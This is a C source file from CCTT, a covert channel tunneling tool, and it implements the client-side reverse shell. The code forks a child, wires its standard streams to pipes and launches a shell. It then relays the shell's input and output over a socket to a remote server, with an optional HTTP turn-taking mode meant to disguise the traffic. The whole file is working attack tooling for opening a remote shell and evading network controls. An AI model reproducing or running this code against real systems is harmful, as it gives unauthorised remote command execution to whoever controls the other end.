/*
** CCTT - Covert Channel Tunneling Tool - v0.1.7
** Copyright (C) 2002,2003 Simon Castro - scastro@entreelibre.com
** $Id: channel_do_socket_rshell.c,v 1.6 2003/06/10 15:21:16 simsim Exp $
**
** This file is part of CCTT - v0.1.7 (C) 2002,2003 Simon Castro.
** 
** Cctt is free software; you can redistribute it and/or modify
** it under the terms of the GNU General Public License as published by
** the Free Software Foundation; either version 2 of the License, or
** (at your option) any later version.
**
** Cctt is distributed in the hope that it will be useful,
** but WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
** GNU General Public License for more details.
** 
** You should have received a copy of the GNU General Public License
** along with Cctt; if not, write to the Free Software
** Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
*/

#include "../includes/definitions.h"

/*
** Cette fonction implemente le reverse shell sur une socket standard.
*/

int channel_do_socket_rshell(S_OPTIONS *options)
{
  int i;
  
  /* Gestion du fork */
  int fils; /* pid du fils pour le pere */
  int test; /* flag de retour wait3 */
  int pid;  /* pour wait3 */
  int fils_father[2]; /* pipe entre fils et pere */
  int father_fils[2];  /* pipe entre pere et fils */

  /* Lecture/Ecriture entre pere et fils */
  int nrshell=0;
  int nrsocket=0;
  char buffer[SOCKET_BUFFER_SIZE+1]; /* La taille du buffer est precisee dans includes/definitions.h */
  
  /* Set de Fds pour le select */
  fd_set fdset_read;
  int highest_fd;

  /* Socket Up ? */
  int socket_up=1;
  
  /* A qui le tour en mode HTTP ? */
  int http_turn=0;
  
  /* Initialisation des pipes*/
  pipe(fils_father); /* le pipe entre fils et pere */
  pipe(father_fils); /* le pipe entre pere et fils */

  cctt_verbose(stderr,"%s","Going to execute reverse shell !\n");
  
  if ((fils = fork()) == 0) /* La, on est dans le fils */
    {
      /* 
      ** On ferme l'un des cotes du pipe.
      ** On ferme stdin, stdout et stderr.
      ** On redirige stdin, stdout et stderr vers les pipe 
      */
      close(fils_father[0]);
      close(father_fils[1]);
      for (i=0;i<3;i++)
	close (i);
      dup2(father_fils[0],0);
      dup2(fils_father[1],1);
      dup2(fils_father[1],2);

      /* On appelle le reverse shell */
      exec_rshell();
    }
  else
    {
      if (fils == -1) /* La, on est en erreur fork */
	cctt_error(stderr,"%s","[Client] : Fork cannot create another process !\n");
      else /* La, on est dans le pere */
	{
	  cctt_verbose(stderr,"%s","Reverse Shell is running !\n");
	  
	  /*
	  ** On ferme les extremites des pipes
	  ** On prepare le Set pour le select
	  */
	  close(fils_father[1]);
	  close(father_fils[0]);
	  FD_ZERO(&fdset_read);
	  FD_SET(fils_father[0],&fdset_read);
	  FD_SET(options->cl_options->sd,&fdset_read);
	  
	  /* Quel est le plus grand Fd a ajouter dans
	  ** le select pour la supervisation ?
	  */
	  highest_fd = (fils_father[0]>options->cl_options->sd?
			fils_father[0]+1:
			options->cl_options->sd+1);
	  /* 
	  ** Tant que le fils est up et que la socket l'est aussi
	  */
	  while ((pid = wait3(&test,WNOHANG,NULL))!=-1 && socket_up == 1)
	    {
     	      /*
	      ** Si le select retourne une erreur, la fonction retourne
	      ** et l'erreur est geree dans la fonction appelante.
	      */
	      if ((select(highest_fd,&fdset_read,NULL,NULL,0)) < 0)
		return(-1);
	      else
		{
		  /*
		  ** Si des donnees se presentent sur le pipe (i.e. : elles
		  ** proviennent du shell), on les lit et on les ecrit
		  ** sur la socket.
		  **
		  ** Si on est en mode HTTP, on verifie qu'on a eu une reponse du serveur avant
		  ** d'envoyer une nouvelle requete
		  */
		  if (tell_me_about_encoding(options) == 2)
		    {
		      if (options->cl_options->http_turn == 0 && FD_ISSET(fils_father[0],&fdset_read))
			{
			  memset(buffer,0,options->cl_options->srv_socket_buffer_size+1);
			  nrshell = read(fils_father[0],buffer,options->cl_options->srv_socket_buffer_size);
			  if (nrshell > 0)
			    {
			      if (OPT_DEBUG2()) cctt_debug(stderr,"Conn : Socket_channel : read %d from shell -> write to socket",nrshell);
			      do_client_has_something_to_encode(options,
								options->cl_options->sd,
								buffer,nrshell);
			      options->cl_options->http_turn = 1;

			    }
			}
		    }
		  else
		  if (FD_ISSET(fils_father[0],&fdset_read))
		    {
			memset(buffer,0,options->cl_options->srv_socket_buffer_size+1);
			nrshell = read(fils_father[0],buffer,options->cl_options->srv_socket_buffer_size);
		      if (nrshell > 0)
			{
			  if (OPT_DEBUG2()) cctt_debug(stderr,"Conn : Socket_channel : read %d from shell -> write to socket",nrshell);
			  do_client_has_something_to_encode(options,options->cl_options->sd,buffer,nrshell);
			}
		    }
		  /*
		  ** Si des donnees se presentent sur la socket (i.e. : elles
		  ** proviennent du client, on les lit et on les ecrit sur
		  ** le pipe (i.e. : vers le shell).
		  */
		  if (FD_ISSET(options->cl_options->sd,&fdset_read))
		    {
		      memset(buffer,0,SOCKET_BUFFER_SIZE+1);
		      nrsocket = read(options->cl_options->sd,buffer,SOCKET_BUFFER_SIZE);
		      if (nrsocket > 0)
			{
			  if (OPT_DEBUG2()) cctt_debug(stderr,"Conn : Socket_channel : read %d from socket -> write to shell",nrsocket);
			  do_client_has_something_to_decode(options,father_fils[1],buffer,nrsocket);
			  /* On met a jour le turn client/serveur au cas ou on est en mode HTTP */
			  options->cl_options->http_turn = 0;
			}
		      else
			{
			  /* La socket est tombee, on sort de la boucle et on tue le fils */
			  socket_up = 0;
			  kill(fils,9);
			  cctt_error(stderr,"%s","[Client] : Server closed the socket !\n");
			  test = 0;
			}
			
		    }
		}

	      /*
	      ** Ceci est specifique au mode HTTP
	      ** Voir les explications dans channel_do_socket_go.c
	      */
	      if (tell_me_about_encoding(options) == 2)
		{
		  http_turn += 100;
		  if (http_turn > options->cl_options->http_mode_del_bet_con * 2 &&
		      options->cl_options->http_turn == 1)
		    {
		      http_turn = 0;
		      options->cl_options->http_turn = 0;
		    }
		}
	      /*
	      ** On reinitialise le set du select pour eviter que l'appel soit bloquant.
	      */
	      FD_ZERO(&fdset_read);
	      FD_SET(fils_father[0],&fdset_read);
	      FD_SET(options->cl_options->sd,&fdset_read);
	    }
	}
      
    }
  /*
  ** On teste la valeur de retour du process fils (i.e. : le shell)
  */
  if (test == 0)
    cctt_verbose(stderr,"%s","Reverse Shell is done !\n");
  else
    cctt_error(stderr,"%s","[Client] : Execvp couldn't start the command shell !\n");
  return (0);
}
